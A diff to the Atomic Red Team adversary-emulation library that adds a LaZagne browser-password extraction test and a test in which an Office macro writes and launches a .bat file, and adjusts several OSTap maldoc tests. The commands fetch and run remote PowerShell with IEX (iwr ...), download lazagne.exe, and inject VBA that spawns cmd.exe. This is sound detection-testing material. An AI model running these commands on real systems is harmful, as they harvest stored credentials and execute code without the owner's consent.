diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index dbe30ffd..3126ec14 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -184,6 +184,7 @@ credential-access,T1552.001,Credentials In Files,3,Extracting passwords with fin
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
+credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
@@ -631,6 +632,7 @@ execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4
execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
+execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 6e04db29..def25897 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -438,6 +438,7 @@ execution,T1204.002,Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4
execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
+execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -477,6 +478,7 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
+credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index a26388e2..e328af02 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -383,6 +383,7 @@
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
+ - Atomic Test #3: LaZagne - Credentials from Browser [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
@@ -1088,6 +1089,7 @@
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
+ - Atomic Test #5: Office launching .bat file from AppData [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d4e1343a..fd9c685a 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -835,6 +835,7 @@
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
+ - Atomic Test #5: Office launching .bat file from AppData [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -915,6 +916,7 @@
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
+ - Atomic Test #3: LaZagne - Credentials from Browser [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8f2af952..b9f9becc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -17834,6 +17834,34 @@ credential-access:
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
name: sh
+ - name: LaZagne - Credentials from Browser
+ auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014
+ description: "The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne)
+ to extract passwords from browsers on the Windows operating system.\nLaZagne
+ is an open source application used to retrieve passwords stored on a local
+ computer. \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ lazagne_path:
+ description: Path to LaZagne
+ type: Path
+ default: PathToAtomicsFolder\T1555.003\bin\LaZagne.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+
+'
+ prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "#{lazagne_path} browsers\n"
T1552.002:
technique:
external_references:
@@ -42718,7 +42746,7 @@ discovery:
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
- for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
name: command_prompt
- name: System Owner/User Discovery
@@ -44278,8 +44306,7 @@ execution:
description: |
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
- This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+ This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
supported_platforms:
@@ -44296,30 +44323,34 @@ execution:
type: String
default: Word
ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+ description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+ Default latest version.
type: String
- default: '16.0'
+ default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+ -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+ | Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
'
- prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
- { exit 0 } else { exit 1 }
-
-'
+ prereq_command: |
+ $ms_office_version = #{ms_office_version}
+ If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ $ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
- Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+ Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ $ms_office_version = #{ms_office_version}
+ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
@@ -44358,37 +44389,38 @@ execution:
type: String
default: Word
ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+ description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+ Default latest version.
type: String
- default: '16.0'
+ default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+ -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+ | Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
'
- prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
- { exit 0 } else { exit 1 }
-
-'
+ prereq_command: |
+ $ms_office_version = #{ms_office_version}
+ If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ $ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
- Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
- cleanup_command: 'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
- -Name ''AccessVBOM'' -ErrorAction Ignore
-
-'
+ Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+ cleanup_command: |
+ $ms_office_version = #{ms_office_version}
+ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
name: powershell
- name: OSTAP JS version
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
description: |
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
-
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
@@ -44402,30 +44434,80 @@ execution:
type: String
default: Word
ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+ description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+ Default latest version.
type: String
- default: '16.0'
+ default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+ -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+ | Sort-Object -desc)
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
'
- prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
- { exit 0 } else { exit 1 }
-
-'
+ prereq_command: |
+ $ms_office_version = #{ms_office_version}
+ If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ $ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
- Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+ Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
+ $ms_office_version = #{ms_office_version}
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ name: powershell
+ - name: Office launching .bat file from AppData
+ auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
+ description: Microsoft Office creating then launching a .bat script from an
+ AppData directory. The .bat file launches calc.exe when opened.
+ supported_platforms:
+ - windows
+ input_arguments:
+ bat_path:
+ description: Path to malicious .bat file
+ type: String
+ default: $env:temp+"\art1204.bat"
+ ms_office_version:
+ description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
+ Default latest version.
+ type: string
+ default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
+ -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
+ | Sort-Object -desc)[0]
+ ms_product:
+ description: Maldoc application Word or Excel
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Test Requires MS Office to be installed and have been run previously.
+ Run -GetPrereqs to run msword and build dependant registry keys
+
+'
+ prereq_command: |
+ $ms_office_version = #{ms_office_version}
+ If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+ get_prereq_command: |
+ $msword = New-Object -ComObject word.application
+ Stop-Process -Name WINWORD
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ $ms_office_version = #{ms_office_version}
+ $bat_path = #{bat_path}
+ $macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+ Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+ cleanup_command: |
+ $ms_office_version = #{ms_office_version}
+ if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
+ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
name: powershell
T1204.001:
technique:
diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index 01000298..d8bf9166 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -42,7 +42,7 @@ quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
-for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
+for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
```
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index 4f980eca..69c4670c 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -16,14 +16,15 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #4 - OSTAP JS version](#atomic-test-4---ostap-js-version)
+- [Atomic Test #5 - Office launching .bat file from AppData](#atomic-test-5---office-launching-bat-file-from-appdata)
+
## Atomic Test #1 - OSTap Style Macro Execution
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
-
-This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
@@ -37,7 +38,7 @@ References:
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -45,14 +46,16 @@ References:
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
```
#### Cleanup Commands:
```powershell
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+$ms_office_version = #{ms_office_version}
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
@@ -61,7 +64,8 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Check Prereq Commands:
```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -123,7 +127,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -131,13 +135,15 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
```
#### Cleanup Commands:
```powershell
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+$ms_office_version = #{ms_office_version}
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
@@ -146,7 +152,8 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Check Prereq Commands:
```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -162,7 +169,6 @@ Stop-Process -Name WINWORD
## Atomic Test #4 - OSTAP JS version
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
-
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
**Supported Platforms:** Windows
@@ -175,7 +181,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
|------|-------------|------|---------------|
| jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)|
#### Attack Commands: Run with `powershell`!
@@ -183,14 +189,16 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
```
#### Cleanup Commands:
```powershell
+$ms_office_version = #{ms_office_version}
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
@@ -199,7 +207,63 @@ Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Check Prereq Commands:
```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+$msword = New-Object -ComObject word.application
+Stop-Process -Name WINWORD
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Office launching .bat file from AppData
+Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| bat_path | Path to malicious .bat file | String | $env:temp+"\art1204.bat"|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | string | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
+| ms_product | Maldoc application Word or Excel | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$ms_office_version = #{ms_office_version}
+$bat_path = #{bat_path}
+$macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+```
+
+#### Cleanup Commands:
+```powershell
+$ms_office_version = #{ms_office_version}
+if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Check Prereq Commands:
+```powershell
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 38d06ac2..45d8f457 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -147,6 +147,7 @@ atomic_tests:
name: powershell
- name: Office launching .bat file from AppData
+ auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
supported_platforms:
- windows
diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md
index 7ff76184..9f654a47 100644
--- a/atomics/T1555.003/T1555.003.md
+++ b/atomics/T1555.003/T1555.003.md
@@ -16,6 +16,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
- [Atomic Test #2 - Search macOS Safari Cookies](#atomic-test-2---search-macos-safari-cookies)
+- [Atomic Test #3 - LaZagne - Credentials from Browser](#atomic-test-3---lazagne---credentials-from-browser)
+
